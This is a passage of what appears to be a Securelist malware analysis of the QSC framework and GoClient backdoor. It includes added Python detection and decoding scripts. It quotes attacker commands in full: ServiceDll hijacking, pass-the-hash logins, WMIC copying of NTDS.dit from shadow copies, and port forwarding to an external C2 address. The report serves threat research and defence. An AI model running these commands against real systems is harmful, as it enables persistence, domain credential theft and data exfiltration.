  • setConfig: copy configuration data from the Core module to the Network module.
  • checkTarget: validate configuration fields by checking that the lengths of the fields are within their size limits.
  • getNetWork: prepare and return the network object from the Network module for C2 communication. The Network module uses the TLS implementation from the MbedTLS library.

In some cases, we found that the C2 in the configuration data was an internal/proxy IP address, which suggests that the attackers were already aware of the target network topology. The configuration contained the following settings:

  • C2 IP address;
  • Port;
  • Sleep time;
  • Internal/Proxy IP address;
  • Proxy port;
  • Proxy username;
  • Proxy password.

The Core module supports the following C2 commands:

  • 0x1E0001: Send target information (e.g. computer name, user name, OS version, etc.).
  • 0x1E0002: XOR-decode, decompress and load the Command Shell module bytes into memory. If the File Manager module is not loaded, load it before loading the Command Shell module.
  • 0x1E0003: XOR-decode, decompress and load the File Manager module bytes into memory.
  • 0x1E0004: Heartbeat signal, sent every 2 minutes.
  • 0x1E0007: Update the code file path. Create n_600s.sys and write the 0x100 (256) bytes received from the C2 to this file.

The File Manager module


The File Manager module has the internal name qscBrowse.dll. It contains the string “E:\project\test\qt\bin\module\qscBrowse\x64\release\qscBrowse.pdb” as its PDB path, and exports the following methods.

  • destroy: Free objects relating to network connection, file browsing and file transmission.
  • destroyTransmit: Free network connection and file transmit operation related objects.
  • startBrowse: Browse file system.
  • startTransmit: Read/write file from/to system.
  • stop: Close network connection. Stop the browsing and transmitting operations.
  • stopTransmit: Close network connection and stop file transmitting operations.

The Core module, after reflectively injecting the File Manager module, calls its startBrowse method. The startTransmit exported method of the File Manager module contains the functionality to read/write files from/to the system; it is called when the module executes certain commands. The File Manager module supports the following C2 commands:

  • 0x0A20010: If the sub-command is <root>, get the logical drive letters and their types; otherwise, send a list of the files and folders at the specified path.
  • 0x0A20011: Similar to the previous command, but the list of files and folders at the specified path includes LastAccessTime for folders, and LastAccessTime and FileSize for files.
  • 0x0A20012: Read a file and send it to the C2. This is done by calling the startTransmit method.
  • 0x0A20013: Create a file on the system and write data from the C2 to it. This is done by calling the startTransmit method.
  • 0x0A20014: Delete a file from the system.
  • 0x0A20015: Move a file from its existing location to a new one.

Command Shell module


The Command Shell module has the internal name qscShell.dll. It contains the string “E:\project\test\qt\bin\module\qscShell\x64\release\qscShell.pdb” as its PDB path, and exports the methods below.

  • destroy: Free network connection and command shell related objects.
  • startShell: Spawn cmd.exe as a command shell.
  • stop: Close the network connection and terminate the command shell process.

The Core module, after reflectively injecting the Command Shell module, calls its startShell method. The Command Shell module launches %windir%\system32\cmd.exe as a shell using the CreateProcess API, and data is written to and read from the shell using pipes. If the size of the received data exceeds 0xB (11) bytes, the module checks whether the data starts with one of the command strings below. If it does not, the data is written to the command shell via a pipe. If there is no more data to receive, the command shell is closed by issuing an exit command.

  • .put: Create a file and write content to it. This is done by calling the startTransmit method of the File Manager module.
  • .get: Read a file from the system. This is done by calling the startTransmit method of the File Manager module.
  • .ctm <source_file> <dest_file>: Change timestamps. Set the LastWriteTime, LastAccessTime and CreationTime of dest_file to those of source_file.

QSC framework and GoClient backdoor deployment


When we first discovered the QSC framework in 2021, we had insufficient telemetry to find out how the framework was deployed or who the threat actor behind it was. We continued to monitor our telemetry for further signs of the QSC framework. In October 2023, we detected multiple instances of QSC files targeting an ISP in West Asia. Our investigation found that the target machines had been infected with the Quarian backdoor version 3 (aka Turian) since 2022, and the same attackers had used this access to deploy the QSC framework starting on October 10, 2023.

In addition to the QSC framework, the attackers also deployed a new backdoor written in Golang, which we have named “GoClient”. We saw the first deployment of this GoClient backdoor on October 17, 2023. After analyzing all the artifacts from this campaign, we assess, with medium confidence, that the CloudComputating threat actor is behind the deployment of the QSC framework and the GoClient backdoor.

QSC framework deployment


In October 2023, our telemetry showed that the Quarian backdoor was used to copy c:\windows\system32\cmd.exe to c:\windows\task.exe and launch the command shell. The following batch script was then executed via that command shell:

net stop swprv
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\swprr.dll /f
sc config swprv start= auto
ping -n 120 127.0.0.1
net start swprv

As can be seen above, a service is created to launch the QSC framework loader DLL swprr.dll.
In the same month, our telemetry indicated that yet another batch script had been executed via the Quarian backdoor, with similar commands:

net stop rasauto
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32\rasautosvc.dll /f"
sc config rasauto start= auto
ping -n 120 127.0.0.1
net start rasauto

Just like the previous set of commands, the goal is to create a service to launch the QSC framework loader DLL rasautosvc.dll.
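The two scripts above share one pattern: a service's ServiceDll value is rewritten to an attacker DLL, wrapped in a stop / set-to-auto-start / start sequence. As an added example (not code from the Securelist report or the malware), the following scanner checks recovered batch scripts for that pattern; the baseline DLL names in EXPECTED_SERVICEDLL are assumed stock-Windows defaults, and both sample scripts are constructed here rather than taken from the recovered files.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Baseline ServiceDll file names for the two services abused in the report.
# Assumed defaults from a stock Windows install; extend this map for your estate.
EXPECTED_SERVICEDLL = {
    "swprv": "swprv.dll",
    "rasauto": "rasauto.dll",
}

REG_ADD = re.compile(r'^\s*reg\s+add\s+"?(?P<key>[^"\s]+)"?\s+(?P<args>.*)$', re.I)
SERVICE_PARAMS = re.compile(r'\\services\\(?P<svc>[^\\]+)\\Parameters$', re.I)
NET_STOP = re.compile(r'^\s*net\s+stop\s+(?P<svc>\S+)', re.I)
NET_START = re.compile(r'^\s*net\s+start\s+(?P<svc>\S+)', re.I)
SC_AUTO = re.compile(r'^\s*sc\s+config\s+(?P<svc>\S+)\s+start=\s*auto', re.I)


@dataclass
class Finding:
    service: str
    service_dll: str
    expected_dll: Optional[str]
    unexpected_dll: bool    # DLL file name differs from the baseline, or service unknown
    restart_chain: bool     # script also stops, sets to auto-start and restarts the service


def _arg(args: str, flag: str) -> Optional[str]:
    """Return the value following a reg.exe flag such as /v or /d (quoted or bare)."""
    m = re.search(r'(?:^|\s)' + re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', args, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def scan_batch(script: str) -> List[Finding]:
    """Flag ServiceDll rewrites and the stop/auto/start sequence around them."""
    stopped, started, autostart, rewrites = set(), set(), set(), []
    for line in script.splitlines():
        for rx, bucket in ((NET_STOP, stopped), (NET_START, started), (SC_AUTO, autostart)):
            m = rx.match(line)
            if m:
                bucket.add(m.group("svc").lower())
        m = REG_ADD.match(line)
        if not m:
            continue
        key = SERVICE_PARAMS.search(m.group("key"))
        value_name = _arg(m.group("args"), "/v")
        if not key or not value_name or value_name.lower() != "servicedll":
            continue
        rewrites.append((key.group("svc").lower(), _arg(m.group("args"), "/d") or ""))
    findings = []
    for svc, dll in rewrites:
        base = dll.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        expected = EXPECTED_SERVICEDLL.get(svc)
        findings.append(Finding(
            service=svc, service_dll=dll, expected_dll=expected,
            unexpected_dll=expected is None or base != expected,
            restart_chain=svc in stopped and svc in autostart and svc in started,
        ))
    return findings


# Constructed sample mirroring the first script in the report (not the recovered file itself).
# The 120-count ping is a ~2 minute delay before the service is restarted.
SAMPLE_HIJACK = r"""net stop swprv
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\swprr.dll /f
sc config swprv start= auto
ping -n 120 127.0.0.1
net start swprv
"""

# Constructed benign counterpart: same service, but the DLL matches the baseline.
SAMPLE_BENIGN = r"""reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\swprv.dll /f
"""

if __name__ == "__main__":
    for finding in scan_batch(SAMPLE_HIJACK) + scan_batch(SAMPLE_BENIGN):
        print(finding)
```

A ServiceDll rewrite to a non-baseline name is worth an alert on its own; the full stop/auto/start chain around it is what distinguishes the deployment seen here from an administrator's one-off registry change.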
About a month later, the attacker launched a command shell (cmd.exe) using the QSC framework loader DLL file C:\Windows\System32\rasautosvc.dll, and dropped the following QSC framework binaries in the order shown:

  • C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
  • C:\Windows\L2Schemas\update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45)
  • C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
  • C:\Windows\L2Schemas\update.exe (MD5 112820e9a87239c2e11ead80759bef85)
  • C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)

Over the course of the next few months, more QSC framework binaries were dropped on the system via the same mechanism.

GoClient backdoor deployment


Also in October 2023, we found that the threat actor dropped and executed the GoClient backdoor file onto the affected system as c:\programdata\usoshared\intop64.exe, again using the Quarian backdoor infection.

GoClient backdoor


The GoClient backdoor file communicates with the C2, hardcoded in the malware, via TLS. In order to initiate the communication, the malware prepares the challenge key by base64-encoding the hardcoded value of “177a7b1cf2441c7ebf626ebc7e807017” and sending it to the C2 server. If the challenge key is accepted, the C2 server sends a 16-byte value, which will be used as an RC4 key to encrypt/decrypt all subsequent messages between the malware and the server.

Next, the malware collects system information (e.g. hostname, local IP, number of CPUs, etc.) from the victim’s machine in JSON format, encrypts it with the RC4 key, encodes it in base64 and sends it to the server.

The backdoor then receives a base64-encoded and RC4-encrypted, space-delimited list of command strings from the C2 server to execute on the victim’s machine.

The main C2 commands available are listed below:

  • 89562: File manipulation. After checking the available disk space on all drives and sending the information back to the C2, the backdoor can receive the follow-up commands 717953 (rename file), 789852 (change file time attributes), 7412369 (upload file), 7417862 (download file) and 6cb6928f (remove file).
  • 98423: Command execution. The backdoor requests additional commands from the C2 and can receive the follow-up commands 7412369 (upload file), 7417862 (download file), 79c461a4 (set the variable that holds the character encoding string; the default value is “UTF-8”), cd or chdir (change the current working directory) and 75391 (close the connection). Any other command is run by creating a cmd.exe /c process, writing the received commands to its stdin pipe for execution and reading the output from its stdout pipe.
  • dc191340: Close the connection, delete its own module file and terminate its own process.
  • 26c108d6: Take a screenshot of the machine and save it to a file named cap.png.
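The handshake and message framing described above (base64-encoded challenge, 16-byte RC4 session key, RC4-then-base64 JSON profile and space-delimited command lists) are enough to write a decoder for an analyst who has recovered the session key, for instance from a sandbox run. This is an added example, not code from the report or from GoClient: only the challenge value and the command IDs come from the report, while the session key and the captured messages below are constructed for the demonstration.

```python
import base64
import json

# Hardcoded value the report says GoClient base64-encodes as its challenge key.
GOCLIENT_CHALLENGE = b"177a7b1cf2441c7ebf626ebc7e807017"

# Main command IDs from the GoClient command table in the report.
GOCLIENT_COMMANDS = {
    "89562": "file manipulation",
    "98423": "command execution",
    "dc191340": "close connection, self-delete, terminate",
    "26c108d6": "screenshot to cap.png",
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def is_goclient_challenge(first_client_message: bytes) -> bool:
    """Match the first client message after the TLS handshake against the known challenge."""
    return first_client_message.strip() == base64.b64encode(GOCLIENT_CHALLENGE)


def unwrap(session_key: bytes, wire: bytes) -> bytes:
    """Undo GoClient framing: base64 on the outside, RC4 with the 16-byte session key inside."""
    if len(session_key) != 16:
        raise ValueError("GoClient session key is 16 bytes")
    return rc4(session_key, base64.b64decode(wire, validate=True))


def wrap(session_key: bytes, plaintext: bytes) -> bytes:
    """Inverse of unwrap; used here only to build the constructed sample capture."""
    return base64.b64encode(rc4(session_key, plaintext))


def parse_sysinfo(session_key: bytes, wire: bytes) -> dict:
    """Second client message: RC4-encrypted, base64-encoded JSON system profile."""
    return json.loads(unwrap(session_key, wire).decode("utf-8"))


def parse_command_list(session_key: bytes, wire: bytes) -> list:
    """Server message: space-delimited command strings, each labelled from the report's table."""
    tokens = unwrap(session_key, wire).decode("utf-8").split(" ")
    return [(tok, GOCLIENT_COMMANDS.get(tok, "follow-up argument or unknown"))
            for tok in tokens if tok]


# Constructed sample session (NOT real captured traffic): key and messages are made up here.
SAMPLE_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
SAMPLE_SYSINFO = wrap(SAMPLE_KEY, json.dumps(
    {"hostname": "WS01", "ip": "10.0.0.5", "cpus": 4}).encode("utf-8"))
SAMPLE_COMMANDS = wrap(SAMPLE_KEY, b"98423 26c108d6")


def demo() -> dict:
    """Decode the constructed session the way an analyst would after recovering the key."""
    return {
        "challenge_ok": is_goclient_challenge(base64.b64encode(GOCLIENT_CHALLENGE)),
        "sysinfo": parse_sysinfo(SAMPLE_KEY, SAMPLE_SYSINFO),
        "commands": parse_command_list(SAMPLE_KEY, SAMPLE_COMMANDS),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Because the challenge is a fixed base64 string, is_goclient_challenge is also usable as a TLS-inspection or sandbox-egress signature, while the decoding helpers only apply once the server-supplied key is known.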

Post-compromise activity using the GoClient backdoor


As mentioned above, the GoClient backdoor can be used to execute commands on a target system. This functionality was frequently used by the attackers. For example, they dropped the legitimate rar.exe file in c:\inetpub\temp\ and uploaded a batch script, 1.bat, to the same location. Next, according to our telemetry, they executed 1.bat. The batch script contains the following commands:

ping www.google.com -n 2
File Create("c:\inetpub\temp\a.dat");
systeminfo
ipconfig /all
netstat -ano -p tcp
tasklist /svc
net start
net view
arp -a
net localgroup administrators
reg query hkey_users
netsh firewall show config
net group /domain
net group "domain controllers" /domain
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\parameters
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 0x1 /f
c:\inetpub\temp\rar.exe a c:\inetpub\temp\s.rar c:\inetpub\temp\*.dat

As can be seen from the list of executed commands, the attackers are primarily interested in collecting system information. Only at the end do they disable UAC remote restrictions and compress the harvested data with the previously uploaded rar.exe utility.

Post-compromise activity using the QSC framework


The QSC framework was also leveraged to execute a series of commands to find the domain controller on the network, the file server and other machines as shown below. The domain controller was queried to view the list of users within the groups “domain controllers” and “domain computers”:
net group /domain
net group "domain controllers" /domain
ping dc01 -n 1"
ping dc02 -n 1"
net group "domain computers" /domain
ping 172.19.19.1 -n 1
ping 172.19.19.2 -n 1
tracert 172.19.19.2
netstat -ano
ping -a 172.17.104.102 -n 1
netstat -ano
findstr 172.19
ping -n -a fileserver
ping -n 1 -a fileserver
The attackers then dropped a tool to c:\Windows\L2Schemas\we.exe. We could not obtain a copy of we.exe, but it was used to log in to the domain controller machine using the “pass the hash” technique and execute commands remotely:

we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c <user_name>@<domain_controller_ip> "whoami"

we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c <domain>/<user_name>@<domain_controller_ip> -dc-ip <domain_controller_ip> "whoami"

wm.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c <domain>/<user_name>@<domain_controller_ip> "whoami" -with-output
Next, the actor tried to list the users under the group “domain admins”:
net group "domain admins" /domain
One of the domain admin accounts was used by the attacker to remotely execute various commands on the domain controller and other machines using WMIC. Commands were executed to obtain the network configuration and a shadow copy of the C: drive, and to copy the NTDS database out of that shadow copy. All information thus collected was stored at user\downloads\1.txt on the domain controller:

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c ipconfig >>$user\downloads\1.txt"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call create "vssadmin create shadow /for=C: >> $user\downloads\1.txt"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call create "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\NTDS.dit $user\downloads"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call create "vssadmin delete shadows /for=c: /quiet"

Lateral movement (deploying the QSC framework)


By using WMIC and the stolen domain admin credentials, the attackers were able to execute the QSC framework on other machines within the affected network. We found multiple instances during our investigation where the attackers used WMIC to remotely run either a QSC framework loader DLL or a QSC framework executable on a target machine.

We found that the QSC framework sample update.exe (MD5 d99d97bb78929023d77d080da1b10f42) was configured to use a local IP address (pivot machine address 172.17.99[.]5:8080) as its C2 address. Similarly, the sample update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45) was configured to use the same internal pivot machine address (172.17.99[.]5:80), but on port 80. This might suggest either that these samples were deployed on machines without internet access or that the threat actor decided to channel all C2 communication through selected machines for other reasons.

Just after executing each instance of the above QSC framework samples on the remote machine, the attacker executed %windir%\l2schemas\pf.exe on the pivot machine. While we could not obtain a copy of pf.exe, it appeared to perform port forwarding, relaying any traffic arriving at the pivot machine’s local IP address on port 8080/80 to the remote C2 server address 108.61.206[.]206 on port 8080.

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080

tasklist

findstr pf.exe

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c taskkill /im net.exe /f"

net view \\<internal_ip>

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c tasklist >> D:\fileserver\public\applications\drivers\apple\1.txt"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c taskkill /im update.exe /f >> D:\fileserver\public\applications\drivers\apple\1.txt"

taskkill /im pf.exe /f

netsh firewall show state

netsh firewall show config

netsh firewall delete portopening tcp 8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:80 conn:108.61.206[.]206:8080"

tasklist

findstr pf.exe

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c taskkill /im update.exe /f >> D:\fileserver\public\applications\drivers\apple\1.txt"

netstat -anb
netstat -anb -p tcp

netsh firewall show state

netstat -anb -p tcp
findstr 15001

netstat -anb -p tcp
findstr 8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c %temp%\update.exe"

%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:8080 conn:108.61.206[.]206:8080

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c netstat -ano -p tcp >>D:\fileserver\public\applications\drivers\apple\1.txt"

ping -n 1 108.61.206[.]206

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c ping -n 1 40.113.110[.]67 >>D:\fileserver\public\applications\drivers\apple\1.txt"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c tasklist >>D:\fileserver\public\applications\drivers\apple\1.txt"

ping -n 1 40.113.110[.]67

taskkill /im pf.exe /f

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c ping -n 1 <internal_ip_2> >>D:\fileserver\public\applications\drivers\apple\1.txt"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080

net use \\<internal_ip_2> <user_password> /u:<user_name>

tasklist

findstr update.exe

net use * /d /y

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "%windir%\l2schemas\update.exe"

wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c tasklist >>D:\fileserver\public\applications\drivers\apple\1.txt"

"wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call create "system32\cmd.exe /c netstat -ano -p tcp >>D:\fileserver\public\applications\drivers\apple\1.txt"

%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080
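The command stream above has two recurring shapes that an EDR or Sysmon process-creation feed exposes directly: WMIC remote process creation against an internal node, and a pf.exe relay opened on the pivot right after it. As an added example, not part of the report, the hunt below correlates the two over a list of command lines; the sample lines are constructed to mirror the pattern, with an RFC 5737 test address in place of the real C2 and a placeholder account, and the pf.exe argument syntax is taken as observed in the report.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# wmic /node:<host> /user:<user> /password:<pw> process call create "<command>"
WMIC_CREATE = re.compile(
    r'wmic\s+/node:(?P<node>\S+)\s+/user:(?P<user>\S+)\s+/password:\S+\s+'
    r'process\s+call\s+create\s+"(?P<cmd>[^"]*)"', re.I)
# pf.exe tcp listen:<addr>:<port> conn:<addr>:<port>  (argument syntax as seen in the report)
PORT_FORWARD = re.compile(
    r'pf\.exe\s+tcp\s+listen:(?P<laddr>[\d.]+):(?P<lport>\d+)\s+'
    r'conn:(?P<raddr>[\d.]+):(?P<rport>\d+)', re.I)

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def launched_program(cmd: str) -> str:
    """File name of the program a remote 'cmd.exe /c ...' actually starts (lower-case)."""
    parts = re.split(r'\s/c\s+', cmd, maxsplit=1, flags=re.I)
    body = parts[1] if len(parts) == 2 else cmd
    first = body.strip().split()[0] if body.strip() else ""
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_internal(addr: str) -> bool:
    """True for RFC 1918 space; anything else is treated as a possible external C2."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def summarize(cmdlines: List[str]) -> Dict[str, object]:
    """Correlate WMIC remote process creation with pf.exe relays in one command-line stream."""
    remote: List[Tuple[str, str, str]] = []          # (node, account, program)
    relays: List[Tuple[str, str, str, str]] = []     # (listen addr, listen port, conn addr, conn port)
    for line in cmdlines:
        m = WMIC_CREATE.search(line)
        if m:
            remote.append((m.group("node"), m.group("user"), launched_program(m.group("cmd"))))
            continue
        m = PORT_FORWARD.search(line)
        if m:
            relays.append((m.group("laddr"), m.group("lport"), m.group("raddr"), m.group("rport")))
    external_relays = [r for r in relays if not is_internal(r[2])]
    return {
        "remote_hosts": sorted({n for n, _, _ in remote}),
        "accounts": sorted({u for _, u, _ in remote}),
        "remote_programs": sorted({p for _, _, p in remote}),
        "relays": relays,
        # The report's pattern: start a payload on another host, then relay its C2 traffic out.
        "remote_exec_with_external_relay": bool(remote) and bool(external_relays),
    }


# Constructed sample command lines (not the report's telemetry): 10.0.0.7 stands for the
# remote host, CORP\svc_admin for the stolen account, 203.0.113.10 for the external C2.
SAMPLE_CMDLINES = [
    r'wmic /node:10.0.0.7 /user:CORP\svc_admin /password:REDACTED process call create "system32\cmd.exe /c %temp%\update.exe"',
    r'%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:203.0.113.10:8080',
    r'tasklist',
    r'findstr pf.exe',
    r'wmic /node:10.0.0.7 /user:CORP\svc_admin /password:REDACTED process call create "system32\cmd.exe /c tasklist >> D:\share\1.txt"',
    r'taskkill /im pf.exe /f',
    r'netsh firewall delete portopening tcp 8080',
]

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CMDLINES).items():
        print(f"{key}: {value}")
```

The relay list is what ties the pivot to the C2: a listener on 0.0.0.0 or 127.0.0.1 that connects onward to a non-RFC 1918 address, started around the same time as a remote process creation, is the observable to hunt for across hosts.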

Attribution


We found multiple artifacts that helped us in attributing the QSC framework and the activity described above to the CloudComputating (aka BackdoorDiplomacy, Faking Dragon) group:

  • On February 23, 2024, our product detected the presence of the file C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b). This DLL file is Quarian backdoor version 3 (aka Turian), compiled on Thursday, 28.04.2022 02:59:40 UTC. Quarian backdoor version 3 (aka Turian) was used to deploy the QSC framework and GoClient backdoor as described above.
  • The Quarian backdoor sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) was configured to use the domain “proxy.oracleapps[.]org”, which was previously used by BackdoorDiplomacy as reported by Bitdefender in their report, “Cyber-Espionage in the Middle East: Investigating a New BackdoorDiplomacy Threat Actor Campaign“.
  • The Quarian backdoor sample code is protected by VMProtect. After unpacking it, our KTAE (Kaspersky Threat Attribution Engine) attribution engine found a high degree of similarity with the CloudComputating group’s other malware.
    [Figure: Kaspersky Threat Attribution Engine analysis]
  • We observed that the Quarian backdoor V3 sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) shell command created a copy of cmd.exe in the Windows directory with task.exe as the filename.
  • In this campaign, we found C:\ProgramData\USOShared\ to be a common directory which contained the QSC framework, the GoClient backdoor, Quarian backdoor version 3 binaries and tools used in reconnaissance and post-compromise activity. This also helps in tracing all the implants and tools to the CloudComputating group. Some of the tools, such as TailorScan and StowProxy, are known to have been used by CloudComputating in past activity discovered in the Middle East.
    MD5                               File path                             Comment
    7a5a354b4ee40d694d7935f5061fbd06  C:\ProgramData\USOShared\msvcen.exe   QSC framework
    5eba7f8a9323c2d9ceac9a0f91fad02f  C:\ProgramData\USOShared\intop64.exe  GoClient backdoor
    0fe65bbf23b0c589ad462e847e9bfcaf  C:\ProgramData\USOShared\ts6.exe      TailorScan. Executed by Quarian backdoor
    50be5e66a94a25e61d61028db6a41007  C:\ProgramData\USOShared\agt.exe      StowProxy. Executed by Quarian backdoor
    6a09bc6c19c4236c0bd8a01953371a29  C:\ProgramData\USOShared\pdp.exe      ProcDump. Executed by Quarian backdoor
    efbdfeea6ececf08f24121d5d444b751  C:\ProgramData\USOShared\to0.exe      Executed by Quarian backdoor. Could not get a copy of the sample
    567b921d9757928a4bd137a08cfff06b  C:\ProgramData\USOShared\fn.exe       Executed by Quarian backdoor. Could not get a copy of the sample


Conclusions


Our investigation has revealed a significant shift in the tactics of the CloudComputating group, marked by their adoption of the QSC framework alongside the previously identified Quarian backdoor and its variants. Our telemetry data indicates that the group has initiated limited yet targeted campaigns using the QSC framework, focusing specifically on the telecommunication sector. Additionally, in response to detection of the Quarian backdoor, the group has begun deploying a protected version. The usage of the QSC framework suggests a strategic change in their toolkit, serving as a secondary means to maintain access within compromised networks. This evolution underscores the group’s adaptability and emphasizes the importance of continuous monitoring of its future activities.

QSC is a modular framework, of which only the initial loader remains on disk while the core and network modules are always in memory. Using a plugin-based architecture gives attackers the ability to control which plugin (module) to load in memory on demand depending on the target of interest.

IOCs




securelist.com/cloudcomputatin…